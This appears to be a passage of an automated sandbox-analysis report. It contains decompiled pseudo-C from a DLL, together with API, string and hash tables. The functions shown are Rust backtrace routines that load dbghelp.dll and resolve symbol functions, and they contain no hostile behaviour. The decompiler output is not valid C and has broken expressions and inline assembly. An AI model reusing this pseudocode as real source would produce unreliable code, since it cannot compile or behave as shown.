Instruction Fuzzy Hash: 9D02BDB1E402198BEF10CF98C8907DDBBB1FF49714F244169E919BB284E771A885CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCE4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6ECCE4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ECD39F0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed1e124; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed1e124], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed1e130; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed1e164 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed1e134; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed1e138; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed1e13c; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed1e164 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed1e130, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed104bc);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed1e13c = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed1e130, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed104ac);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed1e138 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed1049c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ECCE6D0(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed1e134 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed1e130 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

0x6ecce4e0
0x6ecce4e4
0x6ecce4e9
0x6ecce4ec
0x6ecce4f3
0x6ecce504
0x6ecce507
0x6ecce50d
0x6ecce515
0x6ecce5f5
0x6ecce5fa
0x6ecce5fc
0x6ecce620
0x00000000
0x6ecce5fe
0x6ecce5fe
0x6ecce600
0x6ecce602
0x6ecce60a
0x6ecce613
0x6ecce619
0x6ecce619
0x00000000
0x6ecce60a
0x6ecce51b
0x6ecce51b
0x6ecce520
0x6ecce525
0x6ecce52c
0x6ecce545
0x6ecce545
0x6ecce54e
0x00000000
0x6ecce554
0x6ecce554
0x6ecce55c
0x6ecce579
0x6ecce579
0x6ecce57b
0x6ecce581
0x6ecce585
0x6ecce5a7
0x6ecce5ab
0x6ecce5ad
0x6ecce5b5
0x6ecce5d7
0x6ecce5d7
0x6ecce5e1
0x6ecce5e3
0x00000000
0x6ecce5b7
0x6ecce5c2
0x6ecce5ca
0x6ecce68d
0x6ecce690
0x6ecce6a6
0x00000000
0x6ecce5d0
0x6ecce5d0
0x6ecce5d2
0x00000000
0x6ecce5d2
0x6ecce5ca
0x6ecce587
0x6ecce592
0x6ecce59a
0x6ecce66a
0x6ecce66d
0x6ecce683
0x00000000
0x6ecce5a0
0x6ecce5a0
0x6ecce5a2
0x00000000
0x6ecce5a2
0x6ecce59a
0x6ecce55e
0x6ecce564
0x6ecce56c
0x6ecce647
0x6ecce64a
0x6ecce660
0x6ecce6ae
0x6ecce6ae
0x6ecce6b4
0x6ecce6c3
0x6ecce572
0x6ecce572
0x6ecce574
0x00000000
0x6ecce574
0x6ecce56c
0x6ecce55c
0x6ecce52e
0x6ecce533
0x6ecce53a
0x6ecce53f
0x6ecce628
0x6ecce62d
0x6ecce632
0x6ecce637
0x6ecce646
0x00000000
0x00000000
0x00000000
0x6ecce53f
0x6ecce52c

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ECCE564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6ECCE592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6ECCE5C2
GetCurrentProcess.KERNEL32 ref: 6ECCE5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE613

Part of subcall function 6ECCE6D0: ReleaseMutex.KERNEL32(?,6ECCE448), ref: 6ECCE6D1

Strings

dbghelp.dll, xrefs: 6ECCE52E
SymGetOptions, xrefs: 6ECCE55E
Local\RustBacktraceMutex, xrefs: 6ECCE5EC
called `Option::unwrap()` on a `None` value, xrefs: 6ECCE651, 6ECCE674, 6ECCE697
SymInitializeW, xrefs: 6ECCE5B7
SymSetOptions, xrefs: 6ECCE587

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: b59ac84e1a809e11a25577b59aecd83aaa264a5ffdd9936b281c71a7f02346fd
Instruction ID: 2980c5692c8c1de6bead1e03434ee2b8887427ac9a6fe1c7c1ec0e698a5e9e38
Opcode Fuzzy Hash: b59ac84e1a809e11a25577b59aecd83aaa264a5ffdd9936b281c71a7f02346fd
Instruction Fuzzy Hash: A041E3B1E546058FEB10DFE58C527EA77B9AB46B24F000438E816ABB80FB359446C753

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCE6E0, Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 588
libraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E6ECCE6E0(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
				void* _v16;
				char _v4528;
				void* __ebp;
				char* _t225;
				void* _t234;
				void* _t237;
				signed int _t240;
				signed int _t243;
				signed char _t249;
				intOrPtr _t250;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed char _t262;
				signed int _t265;
				signed short _t267;
				signed short* _t269;
				signed int _t273;
				void* _t277;
				void* _t278;
				intOrPtr _t279;
				signed int _t281;
				void* _t283;
				intOrPtr _t284;
				signed int _t286;
				signed short _t290;
				signed int _t292;
				signed short* _t293;
				signed short _t294;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed short* _t317;
				intOrPtr _t321;
				intOrPtr _t322;
				void* _t328;
				signed int _t330;
				intOrPtr _t333;
				signed int _t337;
				void* _t338;
				void* _t346;
				intOrPtr _t350;
				signed short* _t353;
				signed int _t354;
				signed int _t357;
				void* _t358;
				signed int _t365;
				void* _t366;
				signed short* _t369;
				signed int _t371;
				signed int _t373;
				signed short* _t379;
				signed int _t381;
				signed char _t384;
				signed char _t385;
				intOrPtr _t392;
				signed int* _t393;
				signed char _t394;
				signed int _t397;
				signed char _t398;
				signed int _t399;
				signed int _t400;
				signed short _t401;
				signed int _t407;
				signed int _t409;
				signed char _t410;
				signed int _t411;
				signed short _t412;
				signed int _t418;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;

				_t365 = __edx;
				_t321 = __ecx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t424 = _t423 & 0xfffffff0;
				E6ECDC6C0(0x11b0);
				_t418 = _t424;
				 *((intOrPtr*)(_t418 + 0x1198)) = _t421;
				 *(_t418 + 0x119c) = _t424;
				 *(_t418 + 0x11a8) = 0xffffffff;
				 *((intOrPtr*)(_t418 + 0x11a4)) = E6ECD3A00;
				 *((intOrPtr*)(_t418 + 0x11a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t418 + 0x11a0;
				 *((intOrPtr*)(_t418 + 0x5c)) = __edx;
				_t225 =  *((intOrPtr*)(__ecx));
				if( *_t225 != 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) <= 0x64) {
					_t392 =  *((intOrPtr*)(_t321 + 8));
					_t301 =  *(_t321 + 0xc);
					 *((intOrPtr*)(_t418 + 0x80)) = _t321;
					_t322 =  *((intOrPtr*)(_t321 + 0x10));
					 *(_t418 + 0x1c) = _t365;
					_t366 = _t418 + 0x12;
					 *(_t418 + 0x12) = 0;
					 *((char*)(_t418 + 0x13)) = 0;
					 *(_t418 + 0x84) = _t366;
					 *((intOrPtr*)(_t418 + 0x88)) = _t225;
					 *((intOrPtr*)(_t418 + 0x8c)) = _t392;
					 *((intOrPtr*)(_t418 + 0x90)) = _t418 + 0x13;
					 *(_t418 + 0x94) = _t301;
					 *((intOrPtr*)(_t418 + 0x98)) = _t322;
					 *((intOrPtr*)(_t418 + 0x7c)) = _t392;
					 *(_t418 + 0x58) = _t301;
					 *((intOrPtr*)(_t418 + 0x78)) = _t322;
					 *((intOrPtr*)(_t418 + 0x9c)) = _t418 + 0x5c;
					if(E6ECCE4E0(_t301, _t392, _t418) == 0) {
						_t393 =  *(_t418 + 0x1c);
						 *(_t418 + 0x2c) = _t366;
						__eflags =  *_t393 ^ 0x00000001 | _t393[1];
						if(( *_t393 ^ 0x00000001 | _t393[1]) != 0) {
							E6ECDE9D0(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t302 =  *0x6ed1e15c; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t302;
							if(_t302 != 0) {
								L33:
								_t234 = GetCurrentProcess();
								_t394 = _t393[0x45];
								 *(_t418 + 0x18) = _t234;
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t369 =  <  ? 0 : _t393[2] - 1;
								 *(_t418 + 0x20) = _t394;
								 *(_t418 + 0x30) = _t369;
								_t237 =  *_t302( *(_t418 + 0x18), _t369, 0, _t394, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t237 - 1;
								if(_t237 != 1) {
									goto L75;
								} else {
									_t250 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t304 = _t418 + 0x1f4;
									_t371 = _t418 + 0xa0;
									 *(_t418 + 0xc) = 0;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t328 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t250 - _t328;
									_t329 =  <=  ? _t250 : _t328;
									_t330 = 0;
									 *(_t418 + 0x14) = _t418 + 0x1f4 + ( <=  ? _t250 : _t328) * 2;
									__eflags = 0;
									 *(_t418 + 0x18) = 0x100;
									if(0 == 0) {
										L37:
										__eflags = _t304 -  *(_t418 + 0x14);
										if(_t304 !=  *(_t418 + 0x14)) {
											_t400 = _t304;
											_t304 = _t304 + 2;
											__eflags = _t304;
											_t401 =  *_t400 & 0x0000ffff;
											goto L39;
										}
									} else {
										asm("o16 nop [cs:eax+eax]");
										L36:
										_t401 = _t330 >> 0x10;
										L39:
										 *(_t418 + 0x1c) = _t330 & 0xffff0000;
										__eflags = (_t401 & 0x0000f800) - 0xd800;
										if((_t401 & 0x0000f800) != 0xd800) {
											 *(_t418 + 0x24) = _t304;
											_t337 = _t401 & 0x0000ffff;
											_t262 = 0;
										} else {
											_t269 = _t304;
											_t337 = 0;
											__eflags = (_t401 & 0x0000ffff) - 0xdbff;
											if((_t401 & 0x0000ffff) <= 0xdbff) {
												_t309 =  *(_t418 + 0x14);
												__eflags = _t269 - _t309;
												if(_t269 == _t309) {
													 *(_t418 + 0x24) = _t309;
													goto L48;
												} else {
													_t310 =  *_t269 & 0x0000ffff;
													 *(_t418 + 0x24) =  &(_t269[1]);
													 *(_t418 + 0x28) = _t310;
													__eflags = (_t310 & 0x0000fc00) - 0xdc00;
													if((_t310 & 0x0000fc00) != 0xdc00) {
														 *(_t418 + 0x1c) = ( *(_t418 + 0x28) & 0x0000ffff) << 0x00000010 | 0x00000001;
														asm("o16 nop [eax+eax]");
														goto L48;
													} else {
														_t262 = 0;
														_t337 = ( *(_t418 + 0x28) + 0x00002400 & 0x0000ffff | (_t401 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											} else {
												 *(_t418 + 0x24) = _t269;
												L48:
												_t262 = 1;
											}
										}
										_t304 =  *(_t418 + 0x18);
										__eflags = _t262 & 0x00000001;
										_t394 = 1;
										_t338 =  !=  ? 0xfffd : _t337;
										__eflags = _t338 - 0x80;
										if(_t338 >= 0x80) {
											_t394 = 2;
											__eflags = _t338 - 0x800;
											if(_t338 >= 0x800) {
												__eflags = _t338 - 0x10000;
												_t394 = 4;
												asm("sbb edi, 0x0");
											}
										}
										_t265 = _t304 - _t394;
										__eflags = _t265;
										 *(_t418 + 0x28) = _t265;
										if(_t265 > 0) {
											 *(_t418 + 0x34) = _t394;
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x18) = _t371;
											E6ECCDB50(_t304, _t338, _t371, _t394, _t418, _t421, _t304);
											_t424 = _t424 + 4;
											_t267 =  *(_t418 + 0x34);
											_t330 =  *(_t418 + 0x1c);
											_t304 =  *(_t418 + 0x24);
											_t371 =  *(_t418 + 0x18) + _t267;
											 *(_t418 + 0xc) =  *(_t418 + 0xc) + _t267;
											__eflags = _t330;
											 *(_t418 + 0x18) =  *(_t418 + 0x28);
											if(_t330 != 0) {
												goto L36;
											} else {
												goto L37;
											}
										}
									}
									__eflags =  *(_t418 + 0xc) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6ECE9470(_t304,  *(_t418 + 0xc), 0x100, _t394, _t418, __eflags, 0x6ed109ec);
										goto L87;
									} else {
										_t397 =  *0x6ed1e160; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t397;
										if(_t397 != 0) {
											L67:
											_t255 = GetCurrentProcess();
											_t333 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t373 = _t418 + 0x38;
											_t256 =  *_t397(_t255,  *(_t418 + 0x30), 0,  *(_t418 + 0x20), 0, 0, _t373, _t333);
											__eflags = _t256 - 1;
											if(_t256 != 1) {
												_t398 = 0;
												__eflags = 0;
											} else {
												_t256 =  *((intOrPtr*)(_t418 + 0x68));
												_t333 =  *((intOrPtr*)(_t418 + 0x6c));
												_t399 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t373 = _t399;
													_t399 = _t399 + 1;
													__eflags =  *((short*)(_t333 + _t373 * 2));
												} while ( *((short*)(_t333 + _t373 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t398 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0xc);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t398;
											 *((intOrPtr*)(_t418 + 0x48)) = _t256;
											 *(_t418 + 0x4c) = _t398;
											 *((intOrPtr*)(_t418 + 0x50)) = _t333;
											 *(_t418 + 0x54) = _t373;
											E6ECCF860(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t258 = GetProcAddress( *0x6ed1e130, "SymGetLineFromInlineContextW");
											__eflags = _t258;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6ECE94E0(_t304, "called `Option::unwrap()` on a `None` value", 0x2b, _t397, _t418, __eflags, 0x6ed10ad0);
												goto L87;
											} else {
												_t397 = _t258;
												 *0x6ed1e160 = _t258;
												goto L67;
											}
										}
									}
								}
							} else {
								_t273 = GetProcAddress( *0x6ed1e130, "SymFromInlineContextW");
								__eflags = _t273;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6ECE94E0(_t302, "called `Option::unwrap()` on a `None` value", 0x2b, _t393, _t418, __eflags, 0x6ed10ad0);
									goto L87;
								} else {
									_t302 = _t273;
									 *0x6ed1e15c = _t273;
									goto L33;
								}
							}
						} else {
							_t312 = _t393[2];
							E6ECDE9D0(_t393, _t418 + 0x1a4, 0, 0xff4);
							_t424 = _t424 + 0xc;
							_t407 =  *0x6ed1e150; // 0x0
							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
							__eflags = _t407;
							if(_t407 != 0) {
								L9:
								_t277 = GetCurrentProcess();
								 *(_t418 + 0xa4) = 0;
								 *(_t418 + 0xa0) = 0;
								_t278 =  *_t407(_t277, _t312, 0, _t418 + 0xa0, _t418 + 0x1a0);
								__eflags = _t278 - 1;
								if(_t278 != 1) {
									L75:
									ReleaseMutex( *(_t418 + 0x2c));
									__eflags =  *((char*)(_t418 + 0x13));
									if( *((char*)(_t418 + 0x13)) != 0) {
										goto L4;
									} else {
										goto L76;
									}
									goto L80;
								} else {
									_t279 =  *((intOrPtr*)(_t418 + 0x1ec));
									asm("xorps xmm0, xmm0");
									_t408 = 0x100;
									 *(_t418 + 0x20) = 0;
									 *(_t418 + 0x14) = _t312;
									asm("movaps [esi+0x190], xmm0");
									asm("movaps [esi+0x180], xmm0");
									asm("movaps [esi+0x170], xmm0");
									asm("movaps [esi+0x160], xmm0");
									asm("movaps [esi+0x150], xmm0");
									asm("movaps [esi+0x140], xmm0");
									asm("movaps [esi+0x130], xmm0");
									asm("movaps [esi+0x120], xmm0");
									asm("movaps [esi+0x110], xmm0");
									asm("movaps [esi+0x100], xmm0");
									asm("movaps [esi+0xf0], xmm0");
									asm("movaps [esi+0xe0], xmm0");
									asm("movaps [esi+0xd0], xmm0");
									asm("movaps [esi+0xc0], xmm0");
									asm("movaps [esi+0xb0], xmm0");
									asm("movaps [esi+0xa0], xmm0");
									_t346 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
									__eflags = _t279 - _t346;
									_t347 =  <=  ? _t279 : _t346;
									_t379 = _t418 + 0x1f4 + ( <=  ? _t279 : _t346) * 2;
									 *(_t418 + 0xc) = _t418 + 0x1f4;
									_t281 = 0;
									 *(_t418 + 0x30) = _t379;
									__eflags = 0;
									 *(_t418 + 0x1c) = _t418 + 0xa0;
									 *(_t418 + 0x28) = 0x100;
									if(0 == 0) {
										L13:
										__eflags =  *(_t418 + 0xc) - _t379;
										if( *(_t418 + 0xc) != _t379) {
											_t353 =  *(_t418 + 0xc);
											_t412 =  *_t353 & 0x0000ffff;
											_t354 =  &(_t353[1]);
											__eflags = _t354;
											 *(_t418 + 0xc) = _t354;
											goto L15;
										}
									} else {
										L12:
										_t412 = _t281 >> 0x10;
										L15:
										 *(_t418 + 0x18) = _t281 & 0xffff0000;
										__eflags = (_t412 & 0x0000f800) - 0xd800;
										if((_t412 & 0x0000f800) != 0xd800) {
											_t357 = _t412 & 0x0000ffff;
											_t384 = 0;
										} else {
											_t357 = 0;
											_t384 = 1;
											__eflags = (_t412 & 0x0000ffff) - 0xdbff;
											if((_t412 & 0x0000ffff) <= 0xdbff) {
												_t317 =  *(_t418 + 0xc);
												_t293 =  *(_t418 + 0x30);
												__eflags = _t317 - _t293;
												if(_t317 == _t293) {
													 *(_t418 + 0xc) = _t293;
												} else {
													_t294 =  *_t317 & 0x0000ffff;
													 *(_t418 + 0xc) =  &(_t317[1]);
													__eflags = (_t294 & 0x0000fc00) - 0xdc00;
													if((_t294 & 0x0000fc00) != 0xdc00) {
														_t297 = (_t294 & 0x0000ffff) << 0x00000010 | 0x00000001;
														__eflags = _t297;
														 *(_t418 + 0x18) = _t297;
													} else {
														_t384 = 0;
														_t357 = (_t294 + 0x00002400 & 0x0000ffff | (_t412 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
													}
												}
											}
											_t312 =  *(_t418 + 0x14);
										}
										__eflags = _t384 & 0x00000001;
										_t385 = 1;
										_t358 =  !=  ? 0xfffd : _t357;
										_t290 =  *(_t418 + 0x28);
										__eflags = _t358 - 0x80;
										if(_t358 >= 0x80) {
											_t385 = 2;
											__eflags = _t358 - 0x800;
											if(_t358 >= 0x800) {
												__eflags = _t358 - 0x10000;
												_t385 = 4;
												asm("sbb edx, 0x0");
											}
										}
										_t408 = _t290 - _t385;
										__eflags = _t408;
										if(_t408 > 0) {
											 *(_t418 + 0x24) = _t385;
											 *(_t418 + 0x34) = _t408;
											 *(_t418 + 0x11a8) = 0;
											E6ECCDB50(_t312, _t358,  *(_t418 + 0x1c), _t408, _t418, _t421, _t290);
											_t424 = _t424 + 4;
											_t292 =  *(_t418 + 0x24);
											_t408 =  *(_t418 + 0x34);
											_t312 =  *(_t418 + 0x14);
											_t379 =  *(_t418 + 0x30);
											 *(_t418 + 0x20) =  *(_t418 + 0x20) + _t292;
											_t281 =  *(_t418 + 0x18);
											__eflags = _t281;
											 *(_t418 + 0x1c) =  *(_t418 + 0x1c) + _t292;
											 *(_t418 + 0x28) =  *(_t418 + 0x34);
											if(_t281 != 0) {
												goto L12;
											} else {
												goto L13;
											}
										}
									}
									__eflags =  *(_t418 + 0x20) - 0x101;
									if(__eflags >= 0) {
										 *(_t418 + 0x11a8) = 0;
										E6ECE9470(_t312,  *(_t418 + 0x20), 0x100, _t408, _t418, __eflags, 0x6ed109ec);
										goto L87;
									} else {
										_t409 =  *0x6ed1e154; // 0x0
										asm("xorps xmm0, xmm0");
										 *(_t418 + 0x74) = 0;
										 *(_t418 + 0x70) = 0;
										asm("movaps [esi+0x60], xmm0");
										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
										__eflags = _t409;
										if(_t409 != 0) {
											L59:
											_t283 = GetCurrentProcess();
											_t350 = _t418 + 0x60;
											 *(_t418 + 0x38) = 0;
											_t381 = _t418 + 0x38;
											_t284 =  *_t409(_t283, _t312, 0, _t381, _t350);
											__eflags = _t284 - 1;
											if(_t284 != 1) {
												_t410 = 0;
												__eflags = 0;
											} else {
												_t284 =  *((intOrPtr*)(_t418 + 0x68));
												_t350 =  *((intOrPtr*)(_t418 + 0x6c));
												_t411 = 0;
												__eflags = 0;
												asm("o16 nop [cs:eax+eax]");
												do {
													_t381 = _t411;
													_t411 = _t411 + 1;
													__eflags =  *((short*)(_t350 + _t381 * 2));
												} while ( *((short*)(_t350 + _t381 * 2)) != 0);
												 *(_t418 + 0x11a8) = 0;
												_t410 = 1;
											}
											 *(_t418 + 0x11a8) = 0;
											 *(_t418 + 0x38) = _t418 + 0xa0;
											 *(_t418 + 0x3c) =  *(_t418 + 0x20);
											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
											 *(_t418 + 0x44) = _t410;
											 *((intOrPtr*)(_t418 + 0x48)) = _t284;
											 *(_t418 + 0x4c) = _t410;
											 *((intOrPtr*)(_t418 + 0x50)) = _t350;
											 *(_t418 + 0x54) = _t381;
											E6ECCF860(_t418 + 0x84, _t418 + 0x38);
											goto L75;
										} else {
											_t286 = GetProcAddress( *0x6ed1e130, "SymGetLineFromAddrW64");
											__eflags = _t286;
											if(__eflags == 0) {
												 *(_t418 + 0x11a8) = 0;
												E6ECE94E0(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t409, _t418, __eflags, 0x6ed10ad0);
												goto L87;
											} else {
												_t409 = _t286;
												 *0x6ed1e154 = _t286;
												goto L59;
											}
										}
									}
								}
							} else {
								_t298 = GetProcAddress( *0x6ed1e130, "SymFromAddrW");
								__eflags = _t298;
								if(__eflags == 0) {
									 *(_t418 + 0x11a8) = 0;
									E6ECE94E0(_t312, "called `Option::unwrap()` on a `None` value", 0x2b, _t407, _t418, __eflags, 0x6ed10ad0);
									L87:
									asm("ud2");
									asm("o16 nop [eax+eax]");
									_push(_t421);
									return E6ECCE6D0( *((intOrPtr*)( &_v4528 + 0x2c)));
								} else {
									_t407 = _t298;
									 *0x6ed1e150 = _t298;
									goto L9;
								}
							}
						}
					} else {
						if( *((char*)(_t418 + 0x13)) == 0) {
							L76:
							__eflags =  *(_t418 + 0x12);
							if( *(_t418 + 0x12) == 0) {
								__eflags =  *((char*)( *((intOrPtr*)(_t418 + 0x7c))));
								if( *((char*)( *((intOrPtr*)(_t418 + 0x7c)))) != 0) {
									 *(_t418 + 0x38) =  *((intOrPtr*)(_t418 + 0x78));
									 *(_t418 + 0x3c) = 0;
									 *(_t418 + 0x1a8) = 4;
									 *(_t418 + 0xa0) = 2;
									 *(_t418 + 0x11a8) = 1;
									_push(0);
									_push(_t418 + 0xa0);
									_push(_t418 + 0x1a0);
									 *( *(_t418 + 0x58)) = E6ECCF0A0(_t418 + 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x5c)) + 8)));
									_t249 =  *(_t418 + 0x38);
									_t202 = _t249 + 4;
									 *_t202 =  *(_t249 + 4) + 1;
									__eflags =  *_t202;
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t418 + 0x80)) + 4)))) + 1;
							_t243 =  *(_t418 + 0x58);
							__eflags =  *_t243;
							_t208 =  *_t243 == 0;
							__eflags = _t208;
							_t240 = _t243 & 0xffffff00 | _t208;
						} else {
							goto L4;
						}
						goto L80;
					}
				} else {
					L4:
					_t240 = 0;
					L80:
					 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0x11a0));
					return _t240;
				}
			}

0x6ecce6e0
0x6ecce6e0
0x6ecce6e3
0x6ecce6e4
0x6ecce6e5
0x6ecce6e6
0x6ecce6ee
0x6ecce6f3
0x6ecce6f5
0x6ecce6fb
0x6ecce701
0x6ecce70b
0x6ecce722
0x6ecce728
0x6ecce72e
0x6ecce731
0x6ecce736
0x6ecce740
0x6ecce743
0x6ecce746
0x6ecce74c
0x6ecce74f
0x6ecce752
0x6ecce755
0x6ecce759
0x6ecce75d
0x6ecce763
0x6ecce76c
0x6ecce772
0x6ecce77b
0x6ecce781
0x6ecce787
0x6ecce78a
0x6ecce78d
0x6ecce790
0x6ecce79d
0x6ecce7b0
0x6ecce7b3
0x6ecce7bb
0x6ecce7be
0x6eccea68
0x6eccea6d
0x6eccea70
0x6eccea76
0x6eccea80
0x6eccea8a
0x6eccea8c
0x6ecceaae
0x6ecceaae
0x6ecceab6
0x6ecceabc
0x6ecceac7
0x6eccead1
0x6ecceade
0x6ecceae9
0x6ecceaef
